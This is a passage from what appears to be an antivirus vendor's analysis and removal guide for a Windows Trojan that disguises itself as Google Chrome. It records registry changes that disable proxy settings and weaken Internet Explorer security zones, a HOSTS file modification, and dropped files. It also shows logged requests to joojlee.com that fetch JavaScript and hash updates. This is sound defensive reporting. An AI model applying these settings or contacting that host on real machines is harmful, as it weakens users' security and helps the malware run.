"Google Chromium" = "%Documents and Settings%\%current user%\Application Data\Chromium.exe"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process wget.exe:612 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA B5 C7 84 55 C6 65 18 D8 1A AD 49 8D A3 42 F9"

The process arsiv.exe:792 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 6A B0 D1 83 7C EC 7D F6 17 EB F1 25 F0 2C F7"

The process %original file name%.exe:1676 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC AC 18 DF C1 D5 6E 61 C5 72 C8 E0 7A 3B 0A 64"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RarSFX0]
"Installer.exe" = "Adobe Installation Helper"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses. The modified file is 15741 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):

   installer.exe:580
   Chromium.exe:1116
   wget.exe:612
   arsiv.exe:792
   %original file name%.exe:1676

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:

   %Documents and Settings%\%current user%\Application Data\Chromium.exe (11258 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.pak (4185 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.pak (1281 bytes)
   %Documents and Settings%\%current user%\Application Data\key.txt (249 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.pak (2105 bytes)
   %System%\drivers\etc\hosts (269066 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.pak (3073 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\resources.pak (43124 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.dll (10 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Application Data\ok.txt (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.pak (3361 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.pak (4545 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.pak (1425 bytes)
   %Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.pak (3073 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\libpeerconnection.dll (15116 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.pak (2321 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jogoilaonpjembimhekgnboineibhdhf\bg.txt (3 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences (73 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.pak (2105 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\setting (28 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\icudt.dll (76505 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.pak (3361 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\chrome_100_percent.pak (7345 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.pak (1281 bytes)
   %Documents and Settings%\%current user%\Desktop\Google Chrome.lnk (791 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.pak (1425 bytes)
   %Documents and Settings%\%current user%\Application Data\wget.exe (1333 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.pak (3361 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\chrome.dll (360605 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.pak (2321 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.pak (1281 bytes)
   %Documents and Settings%\%current user%\Application Data\bg.txt (3 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.pak (2105 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.pak (3361 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\pingjs.js (34 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.pak (2321 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.pak (4185 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\pepflashplayer.dll (113356 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.pak (1425 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.pak (1281 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.pak (3073 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.pak (2321 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.dll (9 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.dll (10 bytes)
   %Documents and Settings%\%current user%\Cookies\Current_User@joojlee[1].txt (214 bytes)
   %Documents and Settings%\%current user%\Application Data\hash.txt (32 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.dll (10 bytes)
   %Program Files%\Google\Chrome\Application\chrome.exe (5889 bytes)
   %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\arsiv.exe (3878606 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.pak (250 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.pak (250 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\libpeerconnection.dll (56491 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\pepflashplayer.dll (277843 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.pak (4074 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\chrome.exe (30992 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\icudt.dll (455362 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.pak (250 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.pak (250 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.pak (5049 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.pak (1274 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome_100_percent.pak (6625 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.pak (2249 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome.dll (794832 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\resources.pak (40311 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.pak (4074 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.pak (3461 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.pak (3257 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.dll (10 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0\installer.exe (38174 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "Google Chromium" = "%Documents and Settings%\%current user%\Application Data\Chromium.exe"

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /ahk/ok.txt HTTP/1.1

User-Agent: AutoHotkey

Host: joojlee.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 13 Feb 2015 13:22:12 GMT

Content-Type: text/plain

Content-Length: 9

Connection: keep-alive

Set-Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732; expires=Sat, 13-Feb-16 13:22:12 GMT; path=/; domain=.joojlee.com; HttpOnly

Accept-Ranges: bytes

ETag: "9-54c9c529-a81721174ce72eb7"

Last-Modified: Thu, 29 Jan 2015 05:29:13 GMT

Server: cloudflare-nginx

CF-RAY: 1b81555b83cc0c6b-AMS

Server_ok....

GET /ahk/req.php?type=update_hash HTTP/1.1

User-Agent: AutoHotkey

Host: joojlee.com

Cache-Control: no-cache

Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732

HTTP/1.1 200 OK

Date: Fri, 13 Feb 2015 13:22:12 GMT

Content-Type: text/javascript; Charset=UTF8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Server: cloudflare-nginx

CF-RAY: 1b81555c73eb0c6b-AMS

0......

GET /ahk/req.php?type=js HTTP/1.1

User-Agent: AutoHotkey

Host: joojlee.com

Cache-Control: no-cache

Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732

HTTP/1.1 200 OK

Date: Fri, 13 Feb 2015 13:22:12 GMT

Content-Type: text/javascript; Charset=UTF8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Server: cloudflare-nginx

CF-RAY: 1b81555d34090c6b-AMS

